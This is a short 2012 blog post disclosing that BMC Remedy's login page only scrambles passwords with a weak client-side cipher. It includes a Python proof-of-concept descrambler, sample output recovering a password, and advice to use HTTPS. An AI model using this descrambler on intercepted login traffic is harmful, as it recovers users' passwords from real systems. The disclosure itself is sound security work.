Tuesday, 22 May 2012

BMC Remedy Password Descrambling

The BMC Remedy application scrambles the users password with client side javascript on the login.jsp page.

// Scrambles passwords using simple cipher algorithm
function getScrambledPassword(pwd) {
    var cipher = ['k', 's', 'z', 'h', 'x', 'b', 'p', 'j', 'v', 'c', 'g', 'f', 'q', 'n', 't', 'm'];
    var result="";
    if (pwd == null)
        pwd = "";
    pwd = encodeURIComponent(pwd);
    //alert("encoded password: " + pwd);
    for(var i=0;i<pwd.length;i++) {
            var cc = pwd.charCodeAt(i);
        result += cipher[Math.floor(cc/16)] + cipher[cc%16];
    }
    //alert("scrambled password: " + result);
    return result;
}
This is a very weak encryption cipher and easily decoded, so provides no real protection for your passwords. Ensure your web application is only served over HTTPS to protect your password and do not rely on this functionality. The following proof of concept reverses the cipher:

password.py
  1. #!/usr/bin/python
  2. from array import *
  3. import sys
  4. if len(sys.argv) != 2:
  5.         print "# BMC Remedy Password Descrambler"
  6.         print "# Author: Meatballs"
  7.         print "# Usage: ./password.py ciphertext"
  8. else:
  9.         cipherText = sys.argv[1]
  10.         print "CipherText: " + cipherText
  11.         cipher = array('c', 'kszhxbpjvcgfqntm')
  12.         plainText = "PlainText: "
  13.         i = 0
  14.         while i < len(cipherText):
  15.                 x = cipher.index(cipherText[i]) * 16
  16.                 i += 1
  17.                 y = cipher.index(cipherText[i])
  18.                 z = x + y
  19.                 plainText += chr(z)
  20.                 i += 1
  21.         print plainText
Example output:

root@bt:/root/# ./password.py bkpsjhjhjjhkjzpxzs
CipherText: bkpsjhjhjjhkjzpxzs
PlainText: Passw0rd!


Read more:

http://myitpath.blogspot.co.uk/2010/09/reversing-remedy-passwords.html

1 comment:

  1. It misses reversing the encodeURIComponent... (urllib.unquote seems suitable...)

    But its a start...

    ReplyDelete